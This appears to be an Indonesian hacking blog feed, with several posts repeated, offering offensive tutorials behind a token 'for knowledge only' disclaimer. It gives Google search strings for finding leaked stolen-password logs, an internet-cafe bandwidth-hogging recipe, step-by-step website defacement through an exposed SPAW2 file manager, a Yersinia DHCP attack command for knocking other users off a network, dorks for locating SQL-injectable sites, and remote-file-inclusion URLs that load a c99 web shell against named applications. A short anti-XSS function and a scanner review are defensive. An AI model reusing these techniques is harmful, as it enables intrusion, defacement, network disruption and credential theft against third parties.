Jadi gitu aja deh...
Saya tegaskan ini hanya utk menambah pengetahuan aja, jadi jgn dipakai utk kejahatan..
Mulai..
Copy paste ini di mbah gugel..
Atau bisa tambahin webnya..
Password juga bisa
Password + web
Program + date
atau terserah agan smua, mau apanya yg ditambahin...
tapi makin banyak bagian yg ditambahin, hasil dimbah gugelnya jdi makin sdikit..
mudah2an bermanfaat...
Jadi gitu aja deh...Saya tegaskan ini hanya utk menambah pengetahuan aja, jadi jgn dipakai utk kejahatan..

Mulai..
Copy paste ini di mbah gugel..
Program: Url/Host: Login: Password: Computer: Date: Ip:
Atau bisa tambahin webnya..
Password juga bisa
Program: Url/Host: Login: Password: 123456 Computer: Date: Ip:
Password + web
Program + date
Program: Firefox Url/Host: Login: Password: Computer: Date: 2010-03-24 Ip:
atau terserah agan smua, mau apanya yg ditambahin...

tapi makin banyak bagian yg ditambahin, hasil dimbah gugelnya jdi makin sdikit..

mudah2an bermanfaat...
Lutfi rahman
Hacking
Hacking bandwidth warnet
Sebelumnya saya juga telah sering mempost tentang cara mencurangi warnet (maklum anak warnetan, hehehhe) Disini dan Disitu
Kali ini ada cara lain yang semoga "bermanfaat", hehe..
1). Buka Browser Mozilla Firefox…
2). Pada Address Bar Ketik : ABOUT:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah “TRUE”)
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE >INTEGER
5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : ABOUT:BLANK
. Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
10). Kemudian Tekan OK Lalu REFRESH ( F5 )
11). Masuk ke website ini https://addons.mozilla.org/en-US/firefox/addon/125?id=125&
applicationfiltered=firefox
12). Download Software SwitchProxy Tool Versi 1.3.4
13). Setelah Selesai Jangan Tekan Tombol UPDATE
14). Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15). Tutup Semua Browser Mozilla FireFox,
16). Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di
Install Tadi
17). Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
18). Sekarang Browser Mozilla Siap Untuk Digunakan…….
:: NOTE :: — Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth
( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
– Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan “BROADBAND / VSAT”
Download juga:
- Google Web accelator (download di: http://webaccelerator.google.com/), mnrt ak kok lbh siip & stabil dr onspeed ya. Soalnya sering ak ukur pake gprs counter, speed grafik nya lbh mantaff dr onspeed. Selain itu GRATIS.
- OpenDNS. Daftarkan ke opendns.com, gratis juga.. so setting DNS TCP/IP.
Tingkatkan bandith PC sampe 20%. Microsoft menggunakan 20% cadangan dari bandwidth untuk update dan melaporkan kondisi computer dll,
ini cara menonaktifkan fungsi ini :
Click Start–>Run–>ketik gpedit.msc —>ok Selanjutnya ke –>Local Computer Policy–>Computer Configuration–>Administrative Templates–>Network–>QOS Packet Scheduler–>Limit Reservable Bandwidth—->klik 2x Limit Reservable Bandwidth Disana tertulis is not configured tapi kenyataannya (baca dibawah explain) “By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default.”jadi triknya adalah pilih enable kemudian di set ke 0 .Sehingga system tidak mempunyai cadangan seperti kondisi default yang sampai 20%
Jika ingin lebih brutale lagi tambahkan addon FastererFox+cfosSpeed yang berguna untuk mengkompres data yang masuk lewat koneksi dialup.
Selamat menikmati brutal speed dari koneksi dial up anda.
Sumber : http://www.syndrome-hacka.org/2012/01/hacking-bandwidth-warnet.html#ixzz1jpIjbTGZ
Lutfi rahman
Hacking
Tutorial Deface asp
google dork : inurl:"spaw2/uploads/files/"
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
![[Image: 216711_115497381863480_100002096566712_1...9466_a.jpg]](http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/216711_115497381863480_100002096566712_140922_479466_a.jpg)
kemudian upload
![[Image: 207321_115498021863416_100002096566712_1...6993_a.jpg]](http://photos-c.ak.fbcdn.net/hphotos-ak-snc6/207321_115498021863416_100002096566712_140936_6066993_a.jpg)
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
![[Image: 216507_115497471863471_100002096566712_1...7884_a.jpg]](http://photos-e.ak.fbcdn.net/hphotos-ak-snc6/216507_115497471863471_000002096566712_140923_6677884_a.jpg)
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
![[Image: 217017_115499915196560_100002096566712_1...4444_a.jpg]](http://photos-d.ak.fbcdn.net/hphotos-ak-snc6/217017_115499915196560_100002096566712_140985_1524444_a.jpg)
dan berikut hasil dari kerjaan diatas td :)
![[Image: 217060_115499768529908_100002096566712_1...3884_a.jpg]](http://photos-f.ak.fbcdn.net/hphotos-ak,snc6/217060_115499768529908_100002096566712_140984_5643884_a.jpg)
semoga sukses
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
![[Image: 216711_115497381863480_100002096566712_1...9466_a.jpg]](http://photos-c.ak.fbcdn.net/hphotos-ak-ash4/216711_115497381863480_100002096566712_140922_479466_a.jpg)
kemudian upload
![[Image: 207321_115498021863416_100002096566712_1...6993_a.jpg]](http://photos-c.ak.fbcdn.net/hphotos-ak-snc6/207321_115498021863416_100002096566712_140936_6066993_a.jpg)
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
![[Image: 216507_115497471863471_100002096566712_1...7884_a.jpg]](http://photos-e.ak.fbcdn.net/hphotos-ak-snc6/216507_115497471863471_000002096566712_140923_6677884_a.jpg)
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
![[Image: 217017_115499915196560_100002096566712_1...4444_a.jpg]](http://photos-d.ak.fbcdn.net/hphotos-ak-snc6/217017_115499915196560_100002096566712_140985_1524444_a.jpg)
dan berikut hasil dari kerjaan diatas td :)
![[Image: 217060_115499768529908_100002096566712_1...3884_a.jpg]](http://photos-f.ak.fbcdn.net/hphotos-ak,snc6/217060_115499768529908_100002096566712_140984_5643884_a.jpg)
semoga sukses
Lutfi rahman
Hacking
Mencegah Serangan XSS
XSS attack menurut saya adalah salah satu metode serangan (hacking) kepada website dengan memasukkan kode-kode HTML kedalam textarea / text field yang terdapat dalam suatu website. Agar mudah dipahami saya akan memberikan sebuah contoh kasus. misalnya seorang attacker akan menyisipkan penggalan kode2 HTML ke dalam Form pencarian yg terdapat pada suatu website. contohnya pada form Komentar, form buku tamu atau form-form lainnya yang memungkinkan seorang attacker / user melakukan postingan dan menyimpan postingan tersebut dalam database.
Kode2 HTML yang tlah tersimpan dalam database nantinya akan di posting / di terbitkan ke halaman website dan menjalankan perintah2 yang telah disisipkan oleh attacker. penggalan2 kode perintah tersebut bisa berupa pengalihan halaman website (redirect page), temp-deface, alert message hingga deface permanent.
dari pengalaman saya serangan XSS juga pernah melumpuhkan server dan merusak sistem (tentunya bukan dengan salah satu contoh kode diatas).
Sebagai pencegahannya agar skrip yang di inputkan oleh attacker tidak berfungsi (tidak bisa di jalankan) maka dari itu kepada programmer2 PHP / developer web agar dapat memproteksi website yang mereka buat dengan bebagai tekhnik, salah satunya dengan membuat fungsi anti_xss sebelum melakukan penyimpanan ke dalam database, seperti berikut :
function anti_xss($isi){
$saring_xss = mysql_real_escape_string(stripslashes(strip_tags(htmlspecialchars($isi,ENT_QUOTES))));
return $saring_xss;
}
$nama =anti_xss($_POST[nama]);
$pesan =anti_xss($_POST[pesan]);
selanjutnya baru dilakukan penyimpanan ke dalam database dengan menginputkan variabel yang value nya telah di ganti. ($nama & $pesan).
oke... sekian dulu, semoga membantu dan bermanfaat.
Lutfi rahman
Hacking,
Tips dan Trik
Hacking Dengan Serangan Yersinia
Sebelum nya mungkin rekan2 sekalian telah mengenal yang namanya net cut,
yups... NetCut adalah salah satu tools hacking yang dapat memutuskan
koneksi jaringan (ARP Spoof) baik di Windows ataupun Linux. Saya
menemukan Netcut banyak di pakai di jaringan wireless kampus-kampus /
tempat yang menyediakan Hotspot. Trus apa hubungannya dengan Yersinia???
Sama dengan NetCut namun dengan serangan yersinia kita bisa menghabiskan resource jaringan jauh lebih banyak... Yersinia berjalan di sistem operasi Linux untuk itu anda harus mempunyai mesin linux, saya menggunakan Distro Linux UBuntu versi 9.10
Secara default yersinia tidak terinstall dalam ubuntu, namun anda bisa menggunakan jasa paman google untuk mencari yersinia tersebut.
setelah anda mendownload yersinia, mulailah menginstall yersinia dengan perintah :
sudo apt-get install yersinia
Setelah terinstall mulailah serangan dengan perintah :
yersinia dhcp -i wlan0 -attack 1
masukkan ROOT dan Bushh kalian, dan rasakan aksi dari serangan yersinia, anda bisa melihat hasilnya di EtherAPE mesin linux kalian.
dibandingkan NetCut, Serangan menggunakan yersinia mampu melumpuhkan koneksi jaringan lebih cepat.
Oya.. 1 lagi... jika musuh2 di jaringan kalian dah pada mampus... ketikkan exit untuk menghentikan serangan yersinia.
Sama dengan NetCut namun dengan serangan yersinia kita bisa menghabiskan resource jaringan jauh lebih banyak... Yersinia berjalan di sistem operasi Linux untuk itu anda harus mempunyai mesin linux, saya menggunakan Distro Linux UBuntu versi 9.10
Secara default yersinia tidak terinstall dalam ubuntu, namun anda bisa menggunakan jasa paman google untuk mencari yersinia tersebut.
setelah anda mendownload yersinia, mulailah menginstall yersinia dengan perintah :
sudo apt-get install yersinia
Setelah terinstall mulailah serangan dengan perintah :
yersinia dhcp -i wlan0 -attack 1
masukkan ROOT dan Bushh kalian, dan rasakan aksi dari serangan yersinia, anda bisa melihat hasilnya di EtherAPE mesin linux kalian.
dibandingkan NetCut, Serangan menggunakan yersinia mampu melumpuhkan koneksi jaringan lebih cepat.
Oya.. 1 lagi... jika musuh2 di jaringan kalian dah pada mampus... ketikkan exit untuk menghentikan serangan yersinia.
Lutfi rahman
Hacking
Acunetix Web Vulerability Scanner
Acunetix
adalah salah satu tools yang direcomendasikan dan banyak di pakai oleh
pakar security dan developer web untuk memeriksa keamanan dari website
yang mereka bangun. dalam penggunaannya Acunetix sangatlah user friendly
sehingga mudah, langkah awalnya kita hanya memasukkan alamat wesite
yang akan di scan kemudian Acunetix akan melakukan tugasnya dengan
sendirinya.
Lamanya proses scanning tergantung dari besarnya webiste. untuk aplikasi web sederhana dan standar rata-rata acunetix membutuhkan waktu 15-30 menit untuk memeriksa setiap celah keamanan.
Tidak hanya sebatas memeriksa Acunetix juga akan memberikan rekomendasi untuk perbaikan dari setiap celah yang ditemukan. Aplikasi ini juga akan memeriksa setiap folder yang ada dalam website.
Sangat baik jika dilakukan dalam jaringan lokal / localhost sebelum anda melakukan hosting.
Untuk mendapatkan / mendownload Acunetix Vulnerability Scanner lansung saja ke website resminya di http://www.acunetix.com
Lamanya proses scanning tergantung dari besarnya webiste. untuk aplikasi web sederhana dan standar rata-rata acunetix membutuhkan waktu 15-30 menit untuk memeriksa setiap celah keamanan.
Tidak hanya sebatas memeriksa Acunetix juga akan memberikan rekomendasi untuk perbaikan dari setiap celah yang ditemukan. Aplikasi ini juga akan memeriksa setiap folder yang ada dalam website.
Sangat baik jika dilakukan dalam jaringan lokal / localhost sebelum anda melakukan hosting.
Untuk mendapatkan / mendownload Acunetix Vulnerability Scanner lansung saja ke website resminya di http://www.acunetix.com
Lutfi rahman
Hacking
Menyaring Target (Dork)
Bagi sebagian orang yang sengan melakukan aksi hacking, hal yang pertama
dilakukan sebelum nge-hack adalah mencari target. Dengan banyakan
situs-situs yang bertebaran di internet pasti ada satu / beberapa yang
memiliki bugs (yang saya suka adalah website yang mempunyai bugs SQL).
Ibaratnya menyaring target hacking yang memeiliki bugs SQL sama dengan
mencari ikan tri di samudra. Di antara miliaran website di internet
pasti ada satu/ beberapa yang memiliki Bugs.
Untuk menyaring target sering dikenal dengan nama Dork (Benar gak tuh pendapat saya?)
berikut beberapa dork yang sering saya gunakan dalam mencari target (Sedikit cuma, mudah2an membantu )
allinurl:/category.php?cat=45 (45= bisa anda asusmsikan sendiri)
allinurl:/index.php?cat=45
allinurl:/media.php?module=berita (khusus pengguna CMS Lokomedia)
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
content.php?page= inurl:"content.php?page=*.php"
admin.php?page= inurl:"admin.php?page=*.php"
lib/gore.php?libpath= inurl:"/SQuery/"
SQuery/lib/gore.php?libpath= inurl:"/SQuery/"
index2.php?p= inurl:"index2.php?p=*.php"
index1.php?go= inurl:"index1.php?go=*.php"
news_detail.php?file= inurl:"news_detail.php?file=*.php"
old_reports.php?file= inurl:"old_reports.php?file=*.php"
index.php?x= inurl:"index.php?x=*.php"
index.php?nic= inurl:"index.php?nic=*.php"
homepage.php?sel= inurl:"homepage.php?sel=*.php"
index.php?sel= inurl:"index.php?sel=*.php"
main.php?x= inurl:"main.php?x=*.php"
... Dan Lain-Lain..
.::
Masih banyak lagi beraneka ragam dork yang bisa anda gunakan, tetapi dari pengalaman saya dork di atas sudah banyak membantu dalam menyaring target-target.
Untuk menyaring target sering dikenal dengan nama Dork (Benar gak tuh pendapat saya?)
berikut beberapa dork yang sering saya gunakan dalam mencari target (Sedikit cuma, mudah2an membantu )
allinurl:/category.php?cat=45 (45= bisa anda asusmsikan sendiri)
allinurl:/index.php?cat=45
allinurl:/media.php?module=berita (khusus pengguna CMS Lokomedia)
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
content.php?page= inurl:"content.php?page=*.php"
admin.php?page= inurl:"admin.php?page=*.php"
lib/gore.php?libpath= inurl:"/SQuery/"
SQuery/lib/gore.php?libpath= inurl:"/SQuery/"
index2.php?p= inurl:"index2.php?p=*.php"
index1.php?go= inurl:"index1.php?go=*.php"
news_detail.php?file= inurl:"news_detail.php?file=*.php"
old_reports.php?file= inurl:"old_reports.php?file=*.php"
index.php?x= inurl:"index.php?x=*.php"
index.php?nic= inurl:"index.php?nic=*.php"
homepage.php?sel= inurl:"homepage.php?sel=*.php"
index.php?sel= inurl:"index.php?sel=*.php"
main.php?x= inurl:"main.php?x=*.php"
... Dan Lain-Lain..
.::
Masih banyak lagi beraneka ragam dork yang bisa anda gunakan, tetapi dari pengalaman saya dork di atas sudah banyak membantu dalam menyaring target-target.
Lutfi rahman
Hacking
Logika Deface dengan Teknik RFI
Beberapa command yang seharusnya di ketahui yaitu :
cd NamaDirectory = Melihat / Pindah ke Suatu directory
ls -al = Melihat Suatu Directory secara detail
find = Mengecek/menemukan suatu Directory
cat = Membaca isi suatu file
wget = MengUpload Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[ShellInjection] = Shell.php / c99.php
Sebaiknya kita cari website PHP karena RFI ini sangat baik untuk PHP :O
Silahkan Googling, ataw sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Silahkan Search di Google dengan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasih contoh pathnya http://situstarget.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[ShellInjection]
- PnPhpBB2
Kamu Search di Google masukkan
Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php
powered by pnphpbb2 site:.net atau apa saja yang kalian suka.
contoh pathnya http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[ShellInjection]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[ShellInjection]
- Support Ticket
Kamu Search di Google masukkan
Kata Kunci include/main.php site:.com / include/main.php site:.net atau
apa saja yang kalian suka.
contoh pathnya http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : http://target.com/include/main.php?config[search_disp]=true&include_dir=[ShellInjection]
Lutfi rahman
Hacking
Langganan:
Postingan (Atom)



















